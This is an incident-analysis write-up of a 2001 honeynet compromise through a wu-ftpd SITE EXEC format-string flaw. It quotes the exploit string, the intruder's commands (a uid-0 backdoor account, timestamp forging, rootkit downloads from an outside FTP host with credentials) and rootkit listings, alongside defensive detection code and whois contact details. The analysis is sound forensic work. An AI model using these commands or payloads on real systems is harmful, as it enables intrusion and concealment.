Introduction
This is the analysis of Scan of the Month - October.
Essential tools used:
- Redhat 7.1 machine
- Ethereal 0.8.19
- Perl 5.6.0
All times given here are GMT+8.
Answers to Challenge
* Which vulnerability did the intruder exploit?
The intruder exploited a vulnerability in wu-ftpd, described below:
Name: CVE-2000-0573
Description: The reply function in wu-ftpd 2.6.0 and earlier does not
properly cleanse an untrusted format string, which allows remote attackers
to execute arbitrary commands via the SITE EXEC command.
This is determined from two indicators:
- The FTP server banner reports version "wu-2.6.0(1)".
- The many SITE EXEC attempts carrying printf-style format specifiers, which resulted in a root shell.
The first SITE EXEC in the decode below is a probe: the server answers '%020d|%.f%.f|' with '00000000000000000049|0-2|', i.e. the conversions were interpreted, which shows that the argument reaches a printf-family function unsanitised. The long second SITE EXEC is the exploit itself.
The decode of the start of the attack is shown below:
220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.
SITE EXEC %020d|%.f%.f|
200-00000000000000000049|0-2|
200 (end of '%020d|%.f%.f|')
SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|
The intruder launched the exploit from source IP address 207.35.251.172.
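As an added example, not part of the original write-up, the two indicators above can be turned into a small triage check: parse the wu-ftpd version out of the banner, and flag any SITE EXEC whose argument carries printf-style conversions. The session lines are constructed from the decode above; "SITE EXEC ls -l" is an invented benign command to show what is not flagged, and versions up to and including 2.6.0 are treated as vulnerable, following the CVE description.

```python
import re

# Constructed sample session, modelled on the decode above. The banner and the
# two SITE EXEC probes are the ones seen in the capture; "SITE EXEC ls -l" is a
# made-up benign command.
SAMPLE_BANNER = ("220 ns1 FTP server (Version wu-2.6.0(1) "
                 "Mon Feb 28 10:30:36 EST 2000) ready.")
SAMPLE_COMMANDS = [
    "USER ftp",
    "PASS mozilla@",
    "SITE EXEC %020d|%.f%.f|",
    "SITE EXEC 7 mmmmnnnn" + "%.f" * 30 + "|%08x|%08x|",
    "SITE EXEC ls -l",
    "QUIT",
]

_BANNER_RE = re.compile(r"Version wu-(\d+)\.(\d+)\.(\d+)")
# printf-style conversion: '%', optional flags, width, precision, length
# modifier, then a conversion character. %n is the write primitive used to
# hijack control flow; %x/%d/%f are used to walk the stack.
_CONV_RE = re.compile(r"%[-+ #0]*\d*(?:\.\d*)?[hlLqjzt]*[diouxXeEfFgGcspn]")

def banner_vulnerable(banner, last_vulnerable=(2, 6, 0)):
    """True if the banner advertises wu-ftpd <= last_vulnerable (CVE-2000-0573)."""
    m = _BANNER_RE.search(banner)
    if m is None:
        return False
    return tuple(int(x) for x in m.groups()) <= last_vulnerable

def site_exec_conversions(command):
    """For a SITE EXEC command, return the list of printf conversions in its
    argument (possibly empty). Returns None for any other command, so a caller
    can tell "not SITE EXEC" from "SITE EXEC without format specifiers"."""
    parts = command.strip().split(None, 2)
    if len(parts) < 3 or parts[0].upper() != "SITE" or parts[1].upper() != "EXEC":
        return None
    return _CONV_RE.findall(parts[2])

def triage_session(banner, commands):
    """Summarise one FTP control-channel session for an analyst."""
    hits = []
    for cmd in commands:
        convs = site_exec_conversions(cmd)
        if convs:                                   # non-empty list only
            hits.append({
                "command": cmd[:40],
                "conversions": len(convs),
                "has_percent_n": any(c.endswith("n") for c in convs),
            })
    return {"vulnerable_banner": banner_vulnerable(banner),
            "format_string_hits": hits}

if __name__ == "__main__":
    print(triage_session(SAMPLE_BANNER, SAMPLE_COMMANDS))
```

On the sample session this reports a vulnerable banner and two hits, with 3 and 32 conversions respectively; the probe pattern (a zero-padded %d followed by a run of %.f) is characteristic of the published wu-ftpd SITE EXEC exploits, which walk the stack before writing with %n.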
* What ways, and in what order, did the intruder use to connect and run commands on the system?
This was determined from two sources, the snort log and the syslog, cross-checked against each other.
1] At 2001-09-17 07:52:51
The intruder telnetted in from IP address 217.156.93.166 and tried to log in as userid nobody with password ultravirus, then as nobody with password virus, and finally as userid uucp; the connection then timed out.
2] At 2001-09-17 07:55:45
The intruder connected by FTP from IP address 207.35.251.172 and exploited the wu-ftpd vulnerability to take over the system.
After gaining root, the following commands were issued through the FTP connection:
id;
w
dir
cd /usr
ls
cd local
dir
cd bin
dir
cd etc
ls --color
cd ..
cd etc
ls--color
ls
dir
pwd
cd ..
cd doc
dir
cd /tmp
dir
cd /
dir
cd dev
dir
dir
cd /etc/X11/applnk
ls
cd internet
cd Internet
ls
pwd
passwd nobody -d
08:13:27 After blanking the password of "nobody" with passwd -d, the intruder telnetted into the system as nobody to verify that the account could be used, ran "w" to check, and logged out.
The intruder then continued in the existing FTP connection and issued the following commands:
cd /
mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc /etc/X11/applnk/Internet/.etc
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc /etc
ls
ls -d
ls -s
ls -a
ls -n
ls -lt
cd etc
ls -lt
cat passwd-
08:32:10 The intruder telnetted into the system again as "nobody", then issued the following commands:
su dns
w
cd /tmp
mc -s
cd /dev/rd
ftp teleport.go.ro
(after which the ftp session was exited)
mkdir sdc0
cd sdc0
ls
ftp teleport.go.ro
08:41:34 During the ftp session to teleport.go.ro, the following commands were used (the PORT arguments give the victim's own address, 192.168.1.102, and the data ports 1026, 1027 and 1028 it opened for the active-mode transfers):
USER teleport
PASS gunoierul
SYST
CWD new
TYPE I
PORT 192,168,1,102,4,2
RETR Zer0.tar.gz
PORT 192,168,1,102,4,3
RETR copy.tar.gz
PORT 192,168,1,102,4,4
RETR ooty.tar.gz
QUIT
08:43:05 After retrieving the rootkits, the intruder continued with:
tar zxvf Zer0.tar.gz
cd Zer0/
ls
./Go 24
While "Go" was running, the intruder attempted what appear to be port scans.
08:51:58 The intruder continued with the following commands in an SSH session (this sequence is based on the syslog information):
w
whoami
cd /dev/rd/sdc0
ls
rm Zer0.tar.gz
ls
alias ls='ls --color'
ls
ls
passwd nobody
ping www.yahoo.com
pico /etc/rc.d/rc3.d/S50inet
ls
mv copy.tar.gz /usr/X11R6/bin/.,/copy/
cd /usr/X11R6/bin/.,/copy/
mv copy.tar.gz ../
ls
cd ..
tar zxvf copy tar.gz
chmod 7777 *
ls
rm copy.tar.gz
cd copy
chmod 7777 *
ls
* How did the intruder try to hide his edits from the MAC times?
The commands used to hide the edits from the MAC times, as described previously, are shown again below with comments:
First, create objects to hold the original MAC times
mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
Use touch -r to copy the original access and modification times of /etc/passwd and /etc onto the new objects
touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc /etc/X11/applnk/Internet/.etc
The intruder makes the changes (blank the password of nobody, add a uid 0 account "dns", leave it without a password)
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
Finally, use touch -r in the other direction to put the saved times back on /etc/passwd and /etc
touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc /etc
Caveat for the investigator: touch can only set the access (a) and modification (m) times. The inode change time (ctime) is updated by the kernel on every change to the inode, including the touch itself, and cannot be set from user space, so the ctime of /etc/passwd and /etc still dates the tampering. The hidden objects under /etc/X11/applnk/Internet/ likewise carry copied a/m times but a current ctime, which makes a search for files whose ctime is much newer than their mtime a useful way to find them.
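The following is an added example, not taken from the write-up, that replays the stash / edit / restore sequence on a scratch copy of passwd in a temporary directory, using os.utime as the equivalent of touch -acmr, and reports which of the three timestamps still look untouched afterwards. The 2001-09-17 backdate, the file contents and the path names are constructed for the demonstration.

```python
import os
import tempfile

# Constructed pre-intrusion timestamp: 2001-09-17 00:00:00 UTC, in nanoseconds.
BACKDATE_NS = 1_000_684_800 * 10**9

def mac_times(path):
    """(atime, mtime, ctime) in nanoseconds: the three values a MAC-time tool reads."""
    st = os.stat(path)
    return (st.st_atime_ns, st.st_mtime_ns, st.st_ctime_ns)

def touch_reference(reference, target):
    """What 'touch -acmr reference target' does: copy atime and mtime from
    reference onto target. ctime is not copied; no system call can set it."""
    st = os.stat(reference)
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))

def run_sequence(workdir):
    """Replay stash / edit / restore on scratch files and report what survives."""
    passwd = os.path.join(workdir, "passwd")        # stands in for /etc/passwd
    stash = os.path.join(workdir, ".etcpasswd")     # stands in for .../Internet/.etcpasswd
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    os.utime(passwd, ns=(BACKDATE_NS, BACKDATE_NS))  # looks untouched since 2001
    before = mac_times(passwd)

    # mkdir -p .etcpasswd ; touch -acmr /etc/passwd .etcpasswd
    os.mkdir(stash)
    touch_reference(passwd, stash)
    # adduser dns -d/bin -u 0 -g 0 -s/bin/bash : the edit that must be hidden
    with open(passwd, "a") as f:
        f.write("dns:x:0:0::/bin:/bin/bash\n")
    # touch -acmr .etcpasswd /etc/passwd : the "restore"
    touch_reference(stash, passwd)
    after = mac_times(passwd)

    return {
        "atime_hidden": after[0] == before[0] == BACKDATE_NS,
        "mtime_hidden": after[1] == before[1] == BACKDATE_NS,
        # The append bumped ctime, and the restoring utime() bumped it again,
        # so ctime now reads the real time of the tampering, not 2001.
        "ctime_hidden": after[2] == BACKDATE_NS,
        "ctime_after_ns": after[2],
    }

def demo():
    with tempfile.TemporaryDirectory() as d:
        return run_sequence(d)

if __name__ == "__main__":
    print(demo())
```

On a Linux filesystem the result shows atime and mtime back at the 2001 value and ctime at the present, which is exactly the discrepancy a timeline built from ctime (or from the stashed copies' ctime) exposes.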
* The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
The three rootkits downloaded are Zer0, copy and ooty.
The package listings are shown below:
tar tvfz zero.tar.gz
drwxrwxr-x george/george 0 2001-09-14 08:00:54 Zer0/
-rwxr-xr-x george/george 9458 2001-09-17 08:26:34 Zer0/Go
-rw-r--r-- george/george 100569 2001-09-10 04:38:11 Zer0/ssh.tgz
-rw-rw-r-- george/george 11364 2001-09-10 17:01:02 Zer0/tls.tgz
-rw-r--r-- george/george 11970 2001-09-13 07:10:57 Zer0/adr.tgz
-rw-r--r-- george/george 11723 2001-09-10 04:43:17 Zer0/adr2.tgz
-rw-r--r-- george/george 2333 2001-09-17 08:27:45 Zer0/adore.h
tar tvfz copy.tar.gz
drwxr-xr-x virus/virus 0 2001-08-20 20:35:32 copy/
-rwxrwxrwx virus/virus 8268 2001-03-25 04:31:07 copy/mj2
-rwxrwxr-x virus/virus 8268 2001-05-29 01:40:00 copy/mj3
-rwxr-xr-x virus/virus 652030 1999-09-09 20:50:09 copy/ssh
drwxrwxr-x virus/virus 0 2001-09-05 21:05:39 copy/smrf/
-rwxr-xr-x virus/virus 22846 2001-06-16 20:44:00 copy/smrf/smrf5
-rw-r--r-- virus/virus 1470 2001-09-05 21:04:04 copy/smrf/smurf.ips
-rwxrwxr-- virus/virus 128 2001-08-18 15:37:28 copy/root_them
-rwxrwxr-- virus/virus 12166 2001-06-22 01:25:00 copy/process_list
-rwxrwxrwx virus/virus 12847 2001-02-16 20:07:00 copy/generate
-rwxrwxr-x virus/virus 27682 2001-08-18 15:38:43 copy/suu.tgz
-rwxrwxr-x virus/virus 14365 2001-08-14 10:34:56 copy/genmass
-rwxr-xr-x virus/virus 100158 2001-06-22 09:19:00 copy/zxploit
-rwxrwxrwx virus/virus 15121 2001-01-19 21:09:21 copy/wu-scan
tar tvfz ooty.tar.gz
drwxrwxr-x virus/virus 0 2001-09-04 11:06:12 ooty/
-rw-rw-r-- virus/virus 438 2001-06-28 13:16:50 ooty/CrOn
-rw-r--r-- virus/virus 6100 2001-05-30 08:14:17 ooty/motd
-rwxrwxr-x virus/virus 11894 2001-06-28 13:18:21 ooty/sush
-rwxr-xr-x virus/virus 460 2001-05-30 08:14:17 ooty/bindpar.x
-rw-rw-r-- virus/virus 81 2001-06-28 13:18:19 ooty/bighole.c
-rwxr-xr-x virus/virus 58 2001-06-28 13:18:19 ooty/flare
crw--w---- virus/tty 136,2 2001-09-04 11:06:44 ooty/none ~!bighole
-rwxr-xr-x virus/virus 13548 2001-05-30 08:14:17 ooty/crontab.x
-rwxr-xr-x virus/virus 1791 2001-05-30 08:14:17 ooty/mail.x
-rwxr-xr-x virus/virus 2141 2001-05-30 08:14:17 ooty/perl.x
-rwxr-xr-x virus/virus 1332 2001-05-30 08:14:17 ooty/prlnx.sh
-rwxrwxr-x virus/virus 12025 2001-06-28 13:18:20 ooty/bighole
-rwxr-xr-x virus/virus 14428 2001-05-30 08:14:17 ooty/kernel.x
From the package contents alone there is a certain amount of customisation: several files were created only days before the intrusion (Zer0/Go and Zer0/adore.h are dated 2001-09-17, the day of the attack). The adore LKM rootkit bundled in Zer0 is a well-known one.
* Recover (tell how you did it too) the rootkits from the snort binary capture
Load the snort capture in Ethereal.
For each FTP transfer, select any FTP-DATA packet of that transfer and click 'Follow TCP stream'.
Save the TCP stream in hex dump format to a file.
Open the file in vi and run ':%s/^........//' to strip the 8-character offset column from every line.
Pipe the file through a small perl converter that turns the hex back into a binary file (e.g. 'cat filename | ./convert.pl').
The converter convert.pl is shown below:
#!/usr/bin/perl
# convert.pl - rebuild a binary file from an Ethereal "Hex dump" stream save
# whose 8-character offset column has already been stripped with vi.
# Usage: cat filename | ./convert.pl   (writes rk.tar.gz)
# Assumes each remaining line holds only hex byte pairs and separators; if the
# save format also carries an ASCII column, cut it away first.
use strict;
use warnings;
open(my $out, '>', 'rk.tar.gz') or die "cannot write rk.tar.gz: $!";
binmode($out);                      # the rootkit is a binary tarball
while (my $line = <>) {
    $line =~ s/\W//g;               # drop spaces/newlines, leaving hex digits
    next unless length $line;       # skip blank lines
    print $out pack('H*', $line);   # two hex digits -> one byte
}
close($out);
The output file 'rk.tar.gz' is the recovered rootkit archive; one run is needed per FTP-DATA stream.
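As an added example, not the author's convert.pl, here is the same recovery in Python with two checks the one-liner lacks: it verifies that the offsets in the dump are contiguous (a segment missing from the snort capture shows up as a gap) and that the result starts with the gzip magic 1f 8b before it tries to decompress. The dump layout is assumed to be a fixed-column line of offset, 16 hex bytes and an ASCII column, as written by Wireshark-style stream saves; the exact Ethereal 0.8.19 layout is not shown on this page, so HEX_START/ASCII_START may need adjusting. The sample dump is constructed here from a gzip-compressed stand-in payload, not from the real rootkit.

```python
import gzip
import re

WIDTH = 16                                 # bytes per dump line
HEX_START = 10                             # after the 8-digit offset and two spaces
ASCII_START = HEX_START + WIDTH * 3 + 1    # hex area is WIDTH*3-1 chars, then two spaces

def format_hex_dump(data):
    """Render bytes in the fixed-column layout this example assumes."""
    lines = []
    for off in range(0, len(data), WIDTH):
        chunk = data[off:off + WIDTH]
        hexpart = " ".join(f"{b:02x}" for b in chunk).ljust(WIDTH * 3 - 1)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart}  {text}")
    return "\n".join(lines)

def parse_hex_dump(text):
    """Rebuild the byte stream from a dump; return (data, gaps).

    gaps holds (expected_offset, seen_offset) pairs wherever the offsets are
    not contiguous, which is what a segment missing from the capture looks like.
    Lines that do not start with an 8-digit offset (headers, blanks) are skipped.
    """
    out = bytearray()
    gaps = []
    expected = 0
    for line in text.splitlines():
        if not re.match(r"[0-9A-Fa-f]{8}\s", line):
            continue
        off = int(line[:8], 16)
        chunk = bytes.fromhex(line[HEX_START:ASCII_START - 2])  # whitespace is ignored
        if off != expected:
            gaps.append((expected, off))
            expected = off
        out += chunk
        expected += len(chunk)
    return bytes(out), gaps

def recover_archive(text):
    """Parse the dump and return (payload, gaps).

    payload is the decompressed content when the stream is complete and carries
    the gzip magic; None when gaps were found. A wrong magic raises ValueError,
    since the saved stream is then not the FTP-DATA transfer we wanted.
    """
    data, gaps = parse_hex_dump(text)
    if data[:2] != b"\x1f\x8b":
        raise ValueError(f"not a gzip stream, starts with {data[:2]!r}")
    if gaps:
        return None, gaps
    return gzip.decompress(data), gaps

# Constructed stand-in for a rootkit tarball: a small text payload, gzipped with
# a fixed mtime so the dump is reproducible. Not the real Zer0.tar.gz.
PAYLOAD = b"".join(f"{i:04d} Zer0/Go {i}\n".encode() for i in range(40))
COMPRESSED = gzip.compress(PAYLOAD, mtime=0)
GOOD_DUMP = format_hex_dump(COMPRESSED)
# The same dump with its third line (offset 0x20) deleted, as if that segment
# had been dropped by the sniffer.
_lines = GOOD_DUMP.splitlines()
BROKEN_DUMP = "\n".join(_lines[:2] + _lines[3:])

if __name__ == "__main__":
    print("good:", recover_archive(GOOD_DUMP)[1])
    print("broken:", recover_archive(BROKEN_DUMP)[1])
```

A gap list that is not empty means the archive cannot be trusted even if gunzip happens to succeed on a prefix; in that case go back to the capture and check whether the missing segment is a retransmission that Ethereal placed elsewhere in the stream.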
* What does the rootkit do to hide the presence of the attacker on the system?
Analysis of the "Go" script shows that it does the following to hide the intruder:
1] kills the syslogd daemon
2] checks whether syslog is configured for remote logging and warns the attacker if it is
3] installs the 'adore' LKM rootkit, which does the actual hiding of files, processes and connections
4] uses the 'touch' command to reset timestamps, as described previously
* What did you learn from this exercise?
It is interesting to note that the intruder attacked from two different IP addresses.
Running 'strings' on the zxploit program in the 'copy' rootkit shows that it is a SITE EXEC exploit which logs in with the FTP password "mozilla@", the same password seen in the capture. Hence the intruder most likely used the zxploit program to break into this system.
* How long did this challenge take you?
About 1 hour to determine the exploit used.
About 3 hours to check for tools, but in the end I wrote my own script to extract the rootkits.
About 3 hours to trace the sequence of events.
Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel are important.
Two systems were used in the attack. Their owners are determined using whois, as shown below:
whois "217.156.93.166"@whois.ripe.net
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 217.156.93.0 - 217.156.93.255
netname: MIDO-IMPEX
descr: S.C. MIDO IMPEX S.R.L.
descr: 9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA
country: RO
admin-c: RD5445-RIPE
tech-c: RD5445-RIPE
status: ASSIGNED PA
mnt-by: AS3233-MNT
notify: domain-admin@listserv.rnc.ro
changed: cristih@rnc.ro 20010515
source: RIPE
person: ROMULUS DOGARU
address: 9 C 5 MARASESTI ST
address: 5500, BACAU
address: ROMANIA
phone: +40-34-171060
fax-no: +40-34-171080
e-mail: romi@mido.ro
nic-hdl: RD5445-RIPE
notify: domain-admin@listserv.rnc.ro
mnt-by: AS3233-MNT
changed: cristih@rnc.ro 20001124
source: RIPE
whois "207.35.251.172"@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA) GRICS01 207.35.0.0 - 207.35.255.255
B-Line Technical Services (NETBLK-B-LINE-CA) B-LINE-CA 207.35.251.160 - 207.35.251.191
whois GRICS01@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA)
265 de la Couronne
Quebec City, Quebec J2S 1H9
CA
Netname: GRICS01
Netblock: 207.35.0.0 - 207.35.255.255
Maintainer: LINX
Coordinator:
Daoust, Philippe (PD135-ARIN)
noc@in.bell.ca
1-800-450-7771 +1 (416) 215-5423
Domain System inverse mapping provided by:
NS1.BELLGLOBAL.COM
198.235.216.1
NS2.BELLGLOBAL.COM
198.235.216.2
ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
Record last updated on 26-May-2000.
Database last updated on 2-Oct-2001 23:19:58 EDT.
The following is a sample notification letter:
Dear owner,
Our machine was recently compromised. After analysis of our logs we have clear and persistent evidence that your machine was used to gain unauthorised entry to it. Please disconnect your machine from the network immediately, and involve your local authorities if you require help in following up.
Attached is a partial packet capture of the intrusion (times are 2001-09-17, GMT+8), showing the connections from:
217.156.93.166
207.35.251.172